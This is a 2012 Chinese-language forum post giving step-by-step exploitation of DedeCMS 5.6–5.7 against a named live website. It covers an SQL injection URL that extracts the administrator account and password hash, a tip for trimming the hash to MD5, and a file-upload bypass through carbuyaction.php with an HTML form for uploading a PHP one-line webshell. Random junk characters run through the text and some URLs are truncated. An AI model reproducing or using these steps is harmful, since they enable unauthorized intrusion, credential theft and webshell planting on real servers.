找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2891|回复: 0
打印 上一主题 下一主题

dedecms5.6-5.7注入与上传漏洞利用

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 10:56:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
①注入漏洞。
# \  I; Q7 W; L# \这站 http://www.political-security.com/
4 V0 A2 \0 U4 b, d( {5 o) P首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
) c/ @/ t: z( y4 Z$ ]7 nwww.political-security.com/data/mysql_error_trace.inc 爆后台% \6 g; N( Q% s
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。* P1 C+ C  K+ G
然后写上语句
# W0 e0 v. C" s4 C6 w3 N& K查看管理员帐号, }- x# ^1 Q- H% ?; K9 h0 Q
http://www.political-security.co ... &membergroup=@`% z( `( t8 r, p

% P4 d+ G1 T$ {% X  _admin 1 T% ^! {7 T- T* `+ N0 E
3 t/ z7 T3 g. ~6 o2 b3 n7 L% s, W
查看管理员密码0 a2 {5 g/ I' {" B3 G$ E) q
 http://www.political-security.co ... &membergroup=@`3 u+ V1 J8 q2 d

: p( ~( X# o  K# b8d29b1ef9f8c5a5af429' A4 }) N2 M0 ~0 o

0 w& ~& `. `6 ~0 r5 R查看管理员密码
% P7 J5 O2 o8 F' n$ x9 ]* V1 I8 Z, |6 A
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD54 L4 u. r* N" w6 G. j
2 V0 J& y1 m6 f$ s! [
8d2
: f( w3 F$ E. E3 a1 q& Y9b1ef9f8c5a5af427 w2 }: {5 S3 _1 M& `3 M- |
9; F# m  Y9 S( M$ F( H

" {0 c' X6 e" s+ p7 Wcmd5没解出来 只好测试第二个方法# C& x; A: O7 o* }8 ?' O
/ Z4 ]# G1 d9 `) y9 P5 z% o  k  Y

7 K8 s5 p3 @! o: b) f②上传漏洞:
0 F( B/ M3 g4 b# i+ Y, y" ]' j* a8 q6 Q
只要登陆会员中心,然后访问页面链接3 c" p  ^( Y1 w+ r+ x" m
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
+ h' U. G: G+ \* n# e4 Q: C  Q6 {$ ?8 G! o' L
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
" p2 \( S' X' a
+ z- N! K( }* K1 i: O, t: H) U于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
; l1 G' Q8 J6 I0 J. [+ z0 t9 {
" t, f) @; v0 O/ V. \) T6 u- Q* r2 {<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
; z" @& ^: P6 M或者3 J: C3 m+ D; z0 X* h6 \) U+ |9 x
即可上传成功
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表